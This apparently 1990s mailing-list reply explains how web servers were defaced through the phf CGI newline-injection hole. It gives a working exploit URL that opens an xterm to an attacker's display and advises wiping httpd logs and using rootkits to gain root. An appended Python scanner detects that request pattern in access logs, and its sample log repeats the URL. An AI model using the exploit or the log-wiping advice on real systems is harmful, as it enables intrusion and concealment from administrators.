Sebastian Stache wrote:
>I'm getting unnerved by the fact that not only
>have those sites indeed been hacked, but no one
>seems to be surprised.
>
>What techniques were used? To alter the html
>files, someone obviously managed to achieve
>file overwrite rights (at the very least).
You'd be surprised at how many NCSA httpd sites are
still out there which are vulnerable to the attack:
netscape 'http://www.victim.com/cgi-bin/phf?Qalias=x%0a/usr/bin/X11/xterm%20-display%20mydisplay.attacker.com:0'
Once you have an interactive shell (as an open window on your display)
running at the userid the http server (httpd daemon) is running under
you can usually then overwrite the httpd logs in the logfile directory
to erase any trace of your intrusion. Then you will often find that
the htdocs subdirectory is either owned by you or that it has fairly
liberal permissions.
And of course, once you are logged in on a machine you can bring over
all of the hacker toolkits to automate breaking 'root' -- COPS, crack,
"rootkit" (various exploit scripts), etc. Given enough time I'd give
most intruders who have managed to login via telnet a pretty good
chance (> 50%) of breaking maximum security on most Unix systems (i.e.
gain 'root' privileges).
- Morrow
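A defender-side check for the phf request pattern quoted above, as an added example that is not part of the original message: it parses common-log-format access-log lines (a constructed sample is embedded) and flags hits on a phf CGI whose decoded query string carries the %0a newline that lets an extra command through. The log lines, client addresses and timestamps are made up for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines in common log format (not from any real server).
# Line 2 is the request shape quoted in the post; line 3 is an ordinary phf lookup;
# line 4 has an encoded newline but targets a different CGI, so the phf rule ignores it.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/1996:10:01:02 -0500] "GET /index.html HTTP/1.0" 200 512
10.0.0.9 - - [12/Mar/1996:10:02:17 -0500] "GET /cgi-bin/phf?Qalias=x%0a/usr/bin/X11/xterm%20-display%20mydisplay.attacker.com:0 HTTP/1.0" 200 318
10.0.0.7 - - [12/Mar/1996:10:03:44 -0500] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 2048
10.0.0.8 - - [12/Mar/1996:10:04:01 -0500] "GET /cgi-bin/search?q=foo%0abar HTTP/1.0" 200 900
"""

# Common log format: client, ident, user, [timestamp], "METHOD target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the fields of one common-log-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_phf_newline_injection(target):
    """True when the request hits a phf CGI and its decoded query contains a newline.

    phf handed its query arguments to a shell; its input filter did not reject 0x0a,
    so a %0a ends the intended command and whatever follows runs as a second one.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/phf"):
        return False
    query = unquote(parts.query)  # decodes %0a and %0A alike
    return "\n" in query or "\r" in query


def scan_log(text):
    """Scan log text and return one finding per suspicious phf request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real deployment would count these too
        if is_phf_newline_injection(rec["target"]):
            findings.append({"line": lineno, "ip": rec["ip"],
                             "target": rec["target"], "status": rec["status"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: phf newline injection from {f['ip']} (status {f['status']})")
```

Because the post points out that a shell running as the httpd user can overwrite the logs in the logfile directory, a check like this is only reliable when run against copies shipped off the web host.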